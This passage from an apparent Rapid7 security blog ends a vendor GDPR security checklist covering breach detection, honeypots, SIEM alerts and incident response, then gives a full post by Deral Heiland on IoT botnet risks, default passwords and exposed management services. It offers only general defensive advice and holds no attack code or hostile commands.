  6. Detect attackers quickly and early. Finding out that you’ve been breached ~5 months after it first happened is an all too common scenario (current stats from Mandiant say that the average is 146 days after the event). Almost 2/3s of organisations told us that they have no way of detecting compromised credentials, which has topped the list of leading attack vectors in the Verizon DBIR for the last few years. User Behaviour Analytics provide you with the capabilities to detect anomalous user account activity within your environment, so you can investigate and remediate fast.
  7. Lay traps. Deploying deception technologies, like honey pots and honey credentials, are a proven way to spot attackers as they start to poke around in your environment and look for methods to access valuable Personal Data. 
  8. Don’t forget about cloud-based applications. You might have some approved cloud services deployed already, and unless you’ve switched off the internet it’s highly likely that there is a degree of shadow IT (a.k.a. unsanctioned services) happening too. Making sure you have visibility across sanctioned and unsanctioned services is a vital step to securing them, and the data contained within them.
  9. Know how to prioritise and respond to the myriad of alerts your security products generate on a daily basis. If you have a SIEM in place that’s great, providing you’re not getting swamped by alerts from the SIEM, and that you have the capability to respond 24x7 (attackers work evenings and weekends too). If you don’t have a current SIEM (or the time or budget to take on a traditional SIEM deployment project), or you are finding it hard to keep up with the number of alerts you’re currently getting, take a look at InsightIDR – it covers a multitude of bases (SIEM, UBA and EDR), is up and running quickly, and generates alert volumes that are reasonable for even the smallest teams to handle. Alternatively, if you want 24x7 coverage, we also have a Managed Detection and Response offering which takes the burden away, and is your eyes and ears regardless of the time of day or night.
  10. Engage with an incident response team immediately if you think you are in the midst of an attack. Accelerating containment and limiting damage requires fast action. Rapid7 can have an incident response engagement manager on the phone with you within an hour.

 

Security is just one aspect of the GDPR, for sure, but it’s very much key to compliance. Rapid7 can help you ready your organisation, please don’t hesitate to contact us or one of our partners if you are interested in learning more about our solutions and services.

 

GDPR doesn’t have to be GDP-argh!

Deral Heiland

IoT: Friend or Foe?

Posted by Deral Heiland Employee Feb 21, 2017

Since IoT can serve as an enabler, I prefer to consider it a friend.  However, the rise of recent widespread attacks leveraging botnets of IoT devices has called the trust placed in these devices into question. The massive DDoS attacks have quieted down for now, but I do not expect the silence to last long. Since many of the devices used in recent attacks may still be online and many new IoT vulnerabilities continue to be identified, I expect what comes next will look similar or the same as past attacks.

 

While we're enjoying a lull before that happens, I figured it’s time for another good heart-to-heart discussion about the state of IoT security, including what it means to use IoT wisely and how to keep ourselves and each other safe from harm.

 

First I would like to level set: security vulnerabilities are not unique to IoT. We have been dealing with them for decades and I expect we will have them with us for decades to come. We need to focus on building a healthy understanding and respect for the use and security of IoT technologies. This will help us make better-informed decisions in relationship to its associated risk and deployment.

 

So why do IoT security vulnerabilities appear to have become such a threat lately? I think the answer to that question has four parts.

  1. The mass quantity of currently deployed devices. Unfortunately we cannot fix this issue as these devices are already in place and the deployment growth is expected to skyrocket by the end of the decade. Further, I don’t think we should want to fix this issue; there's nothing worse then avoiding new technology solely out of fear.
  2. Common vulnerabilities. IoT technology has taken a beating (rightly so) over the last year or two because of all of the simple vulnerabilities that are being discovered. Simple issues such as weak encryption, unauthenticated access to services, and default passwords hardcoded in the firmware are commonplace and just a small sample of core, basic issues within these devices.
  3. Ease of use. We are living in a plug-and-play generation. As a manufacturer, if your product doesn’t just work out of the box, it is unlikely anyone will buy it. So, sadly, we continue to trade security for usability.
  4. Exposure through unfettered access. Your plug-and-play IoT technology is exposed to any anonymous entity on the Internet. This is analogous to giving your car keys and a bottle of whiskey to not just your sixteen-year-old, but all possible sixteen-year-olds around the world. Nothing good will come of it.

 

So since we are not going to abandon IoT, this makes the first item unfixable. With that said, expect billions more IoT devices to enter our environment over the next coming years. This makes the remaining three items all that much more critical. So let us next discuss these items and look at possible solutions and next steps moving forward.

 

Common vulnerabilities:

We are never going to solve this issue overnight, but it's not like we can just throw up our hands and give up.  In our current IoT world we have dozens of new startups producing new products constantly, as well as dozens of established companies — that have never produced IoT products before — releasing new and “enhanced” products every month. To address these issues it would be great to see these companies implement a security program to facilitate security best practices in the design of their products. For these companies, contacting and partnering with non-profit organizations focused on the public good (like our friends at builditsecure.ly, or I Am The Cavalry) can help them during the design phase. Last but not least, every manufacturer of IoT needs to develop a sound process for handling discovered security issues within their products, including an effective security patching process.

 

Ease of Use:

Everyone likes a product that is easy to deploy and operate, but we need to consider security as part of that deployment. Default passwords issues have been haunting us for years and it's time we exorcise that demon. We need to start making setting a password part of the deployment process of all IoT technology including consumer grade solutions. Passwords are not the only issue we have. Another issue often encountered, is the enabling of all function and services of a given product. Whether they are being used or not has also been a common issue. In those cases only services needed for basic operations should be enabled all other features should be enabled as needed. Of course this will require vendors to put more attention into documentation and making their product management console more intuitive.  In the end with a little work we can expect to see "ease-of-use" also become "ease-of-security" in our IoT products.

 

Exposure:

In the case of exposure issues, these are often just unplanned deployments without consideration of the impact or risk. Exposing IoT management services directly to the Internet such as Telnet, SSH and even web consoles should be avoided, unless you truly need the whole internet knocking at your IoT door. If remote management is vital to the operations of a product it is best practices to make those services available behind VPN or require two factor or both (depending on the nature of the IoT solution being deployed). Another solution is to leverage basic firewall configurations to restrict administrative access to a specific IP address on the host device. Also we do not want to forget that it is very common for IoT technology to have management and control services that do not conform to the standard port numbers. I have seen telnet on a number of different ports besides TCP port 23.  So it is important to understand the product you’re deploying in detail, this will help you to avoid accidental exposures. As added food for thought on deploying IoT technology, consider taking a look at a blog we created several months ago on IoT best practices getting-a-handle-on-the-internet-of-things-in-the-enterprise.

 

So in conclusion, in the debate around the trustworthiness of IoT, we need to turn our attention away from fear, uncertainty, and doubt, and focus on working together to resolve the three issues I have pointed out here. With some diligence and cooperation, I am sure we can better manage the risk associated with the use and deployment of IoT technology. With the growth of IoT expected to skyrocket over the next several years, we pretty much have no choice.

Filter Blog

By date: By tag: